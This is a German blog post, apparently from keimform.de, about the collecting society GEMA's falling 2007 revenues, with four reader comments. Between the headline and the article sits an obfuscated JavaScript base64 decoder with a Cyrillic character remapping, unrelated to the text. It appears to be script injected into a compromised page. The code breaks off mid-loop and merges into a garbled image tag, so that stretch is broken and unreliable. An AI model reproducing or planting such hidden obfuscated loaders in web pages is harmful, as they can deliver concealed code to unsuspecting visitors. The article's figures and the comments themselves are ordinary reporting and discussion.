Auf der Suche nach dem Neuen im Alten
Artikel drucken

Entwertung, die zweite: GEMA schwächelt

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var vb=“;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndand beim OMC#3″ alt=“Bildquelle: jammin-inc.de, Gewinnerband beim OMC#3" align="left" hspace="8" />Wie vorausgesagt hat die GEMA für 2007 ein Einnahme-Minus zu verzeichnen. Die schlechten Nachrichten verkündete der GEMA-Chef Heker bei einer Pressekonferenz am 22.4.08. Im Bereich »Tonträger« kam es zu einem Einbruch: 20 Mio. Euro weniger wurden eingetrieben (-8,3%). Diese werden zum Teil kompensiert durch eine Verdopplung der Einnahmen auf niedrigem Niveau bei »legalen Musikdownloads« (+3,7 Mio.). Reingehauen hat auch ein Minus bei »Kabelweiterleitung« (-18,8 Mio. = -42,7%) im Bereich Rundfunk und Fernsehen -- durch Rückgang bei der Kabelnutzung?

Unterm Strich wurden 24,8 Mio Euro weniger eingenommen (-2,8%), die Ausschüttungssumme sank um 23,4 Mio Euro (-3,1%). Auffällig ist das Fehlen des Frühjahr-GEMA-Briefes, der jeweils im März erscheint und die Umsatzlage des Vorjahres erklärt.

Kategorien: Feindbeobachtung, Reichtum & Knappheit

Tags: , ,

25. April 2008, 10:36 Uhr   4 Kommentare

1 Christian Siefkes (25.04.2008, 12:31 Uhr)

Wieso, der aktuelle „Brief“ ist doch da: Nr. 65 (PDF) – vielleicht grade freigeschaltet worden? Steht allerdings nicht viel Informatives drin, nur die übliche Propaganda.

2 StefanMz (25.04.2008, 14:41 Uhr)

*Haha* — anscheinend hatte die GEMA schlicht verschlafen, die Nr. 65 online zu stellen. Offensichtlich liest die GEMA keimform.de. Na bitte, gern geschehen, diese Erinnerung war kostenfrei 🙂

Ich glaube, ich habe mich auch geirrt: Die Zahlenlage wird erst im zweiten GEMA-Brief des Jahres für’s Publikum interpretiert. Jetzt steht jedenfalls nix dazu drin.

3 Kulturmarketing (09.05.2008, 14:40 Uhr)

Tja, ich verstehe zwar nicht, was daran so klasse sein soll, wenn es für die nicht subventionierte Kultur immer schwieriger wird – aber bitte …

4 GEMA-Vermutung aufheben! — keimform.de (18.10.2012, 09:30 Uhr)

[…] die GEMA ärgern sich viele, auch wir haben uns immer wieder mit ihr beschäftigt (1|2|3|4|5|6). Jetzt läuft eine wirkliche sinnvolle Petition mit diesem Text: Der Deutsche Bundestag möge […]

Schreibe einen Kommentar